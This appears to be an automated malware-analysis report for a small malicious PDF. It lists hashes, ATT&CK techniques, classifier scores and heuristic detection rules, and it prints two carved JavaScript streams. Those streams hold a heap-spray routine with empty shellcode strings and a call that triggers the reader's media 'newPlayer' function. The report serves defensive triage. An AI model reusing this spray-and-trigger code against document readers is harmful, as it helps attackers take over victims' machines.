Malicious PDF — malware analysis report

Static analysis result for SHA-256 81c17e87c050790c…

MALICIOUS

PDF

Size: 1.4 KB
First seen: 2026-05-10
MD5: 601db4fd05dc7726cc780692fdb4e81c
SHA-1: b4a1949244ea55321238b21a0f8720344d2be185
SHA-256: 81c17e87c050790ce0b60b26e651f6e669430db5ea43d1f2c36581808a97b511
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that utilizes the unescape function and performs a heap spray. This behavior is indicative of an exploit attempting to gain control of the execution flow, likely to download and execute a secondary payload. The ML classifier strongly suggests maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • JavaScript action [low] (2 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script:
    var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
    var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0006_000.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x167 | 817 bytes
SHA-256: 9ca00b695994f28bb6b188c1e2be1fb8592d994c57d134a17a342b371c7dbed1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");

while(yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.length <= 32768) yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM+=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM;
yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.substring(0,32768 - WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb.length);

memory=new Array();

for(i=0;i<0x2001;) {
	memory[i]= yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM + WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb;
	i++;
}
try {var obj = this.media;obj["new"+"Player"](null);} catch(e) {}

javascript_obj0006_001.js | pdf-javascript-stream | PDF /JS object 6 at offset 0x189 | 1041 bytes
SHA-256: e2622ea05bacdc49e8573d407ecba12d325fe9e514c79efe6974d47b87cf3dc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb = unescape("");
var yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM = unescape("");

while(yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.length <= 32768) yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM+=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM;
yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM=yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM.substring(0,32768 - WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb.length);

memory=new Array();

for(i=0;i<0x2001;) {
	memory[i]= yRExcnpsFxzQPbkxhrzJMwHciRcFJapkbRTMAiLGeHcyM + WoBlSLYhVaeVjclflqLygNhNzXsnOsZnQunDxWSpZSWfgntPZUmsNAxIyidxEqdauobjRNSDYiXYEWjlchysWVZb;
	i++;
}
try {var obj = this.media;obj["new"+"Player"](null);} catch(e) {}

endstream 
endobj xref
0 7
0000000000 65535 f 
0000000015 00000 n 
0000000100 00000 n 
0000000297 00000 n 
0000000148 00000 n 
0000000207 00000 n 
0000000359 00000 n 
trailer

<<
/Root 1 0 R
/Size 7
>>
startxref
1227
%%EOF